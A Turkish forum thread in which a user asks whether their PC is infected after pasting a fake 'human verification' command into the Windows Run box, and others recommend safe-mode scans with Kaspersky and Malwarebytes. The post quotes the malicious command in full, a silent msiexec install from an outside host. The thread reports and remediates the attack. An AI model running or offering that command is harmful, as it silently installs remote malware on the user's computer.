Bilgisayar virüs mü bulaştı?

Zentax93

Femtopat
Daha fazla  
Bilgisayarda bir şey indiriyorum ve Windows r açtım yanlislikla ardından hiç bilmediğim bir şey vardi. Oda su: Msiexec /fv
Entera bastim hiçbir şey olmadı korkmaya başladım. Virüslü bulaştı. Msiexec /fv https://polarograph.motorcycles/{subid} /q nedir?

Büyük ihtimalle insan doğrulaması falan diyordu sizde kodu kopyalayıp CTRL + Windows'tan enterladınız.
Kaspersky ve Malwarebytes indirip güvenli modda tam tarama gerçekleştirin. Bu 2 AV çok rahat temizlerler diye düşünüyorum o virüsü.

Evet insan doğrulaması diyordu temizler degilmi bir de onlar paralımı?

Güvenli modda nasıl başlatacağız bir de ya temizlemezse.

Çok büyük ihtimalle temizlenir, temizlenmezse farklı Anti-Virüs'ler ile deneriz merak etmeyin.
YouTube yazabilirsiniz Windows 10/11 güvenli modda başlatma diye.

Çok büyük ihtimalle temizlenir, temizlenmezse farklı Anti-Virüs'ler ile deneriz merak etmeyin.

Hocam Kaspersky tam tarama yaptım hiçbir virüs cikmadi şimdi malware yapacağım.

Malware Fast şu an yaptı 2 tane çıktı sil dedim sildi şimdi tam tarama yapıyorum.

Son düzenleme:
Hocam Kaspersky tam tarama yaptım hiçbir virüs cikmadi şimdi malware yapacağım.

Malware Fast şu an yaptı 2 tane çıktı sil dedim sildi şimdi tam tarama yapıyorum.

MB'den sildiğiniz dosyaların adı neydi?

Bu siteyi kullanmak için çerezler gereklidir. Siteyi kullanmaya devam etmek için çerezleri kabul etmelisiniz. Daha Fazlasını Öğren.…